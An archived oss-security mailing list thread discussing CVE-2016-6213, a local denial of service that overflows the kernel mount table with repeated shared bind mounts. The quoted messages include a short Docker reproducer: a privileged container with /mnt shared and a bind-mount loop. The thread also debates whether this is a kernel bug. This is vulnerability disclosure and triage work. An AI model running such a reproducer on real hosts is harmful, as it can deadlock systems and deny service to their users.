oss-sec mailing list archives
Re: Re: cve request: local DoS by overflowing kernel mount table using shared bind mount
From: Jessica Frazelle <me () jessfraz com>
Date: Thu, 14 Jul 2016 12:26:42 -0400
it's running systemd in a container... isn't it... On Thu, Jul 14, 2016 at 12:18 PM, Jessica Frazelle <me () jessfraz com> wrote:
what is the use case for mounting /mnt:/mnt in a container? On Thu, Jul 14, 2016 at 12:15 PM, CAI Qian <caiqian () redhat com> wrote:Maybe this is a better reproducer using docker. It is exploitable even with user namespace enabled. # docker run -it -v /mnt/:/mnt/:shared --cap-add=SYS_ADMIN rhel7 /bin/bash # cat /proc/self/uid_map 0 995 65536 # cat /proc/self/gid_map 0 992 65536 (insider container) # for i in `seq 1 20`; mount -o bind /mnt/1 /mnt/2; done CAI Qian ----- Original Message -----From: "Greg KH" <greg () kroah com> To: oss-security () lists openwall com Cc: caiqian () redhat com, cve-assign () mitre org Sent: Wednesday, July 13, 2016 6:45:00 PM Subject: Re: [oss-security] Re: cve request: local DoS by overflowing kernel mount table using shared bind mount On Wed, Jul 13, 2016 at 12:59:40PM -0400, cve-assign () mitre org wrote:It was reported that the mount table expands by a power-of-two with each bind mount command.If the system is configured in the way that a non-root user allows bind mount even if with limit number of bind mount allowed, a non-root user could cause a local DoS by quickly overflow the mount table.it will cause a deadlock for the whole system,form of unlimited memory consumption that is causing the problemUse CVE-2016-6213.A CVE for an "improperly configured system"? Huh? What distro has such a configuration set by default? This isn't a kernel bug, so what is this CVE classified as being "against"? It better not be against the Linux kernel... confused, greg k-h-- Jessie Frazelle 4096R / D4C4 DD60 0D66 F65A 8EFC 511E 18F3 685C 0022 BFF3 pgp.mit.edu
-- Jessie Frazelle 4096R / D4C4 DD60 0D66 F65A 8EFC 511E 18F3 685C 0022 BFF3 pgp.mit.edu
Current thread:
- cve request: local DoS by overflowing kernel mount table using shared bind mount CAI Qian (Jul 13)
- Re: cve request: local DoS by overflowing kernel mount table using shared bind mount cve-assign (Jul 13)
- Re: Re: cve request: local DoS by overflowing kernel mount table using shared bind mount Greg KH (Jul 13)
- Re: Re: cve request: local DoS by overflowing kernel mount table using shared bind mount CAI Qian (Jul 14)
- Re: Re: cve request: local DoS by overflowing kernel mount table using shared bind mount Jessica Frazelle (Jul 14)
- Re: Re: cve request: local DoS by overflowing kernel mount table using shared bind mount CAI Qian (Jul 15)
- Re: cve request: local DoS by overflowing kernel mount table using shared bind mount Jesse Hertz (Jul 15)
- Re: Re: cve request: local DoS by overflowing kernel mount table using shared bind mount Greg KH (Jul 13)
- Re: cve request: local DoS by overflowing kernel mount table using shared bind mount cve-assign (Jul 13)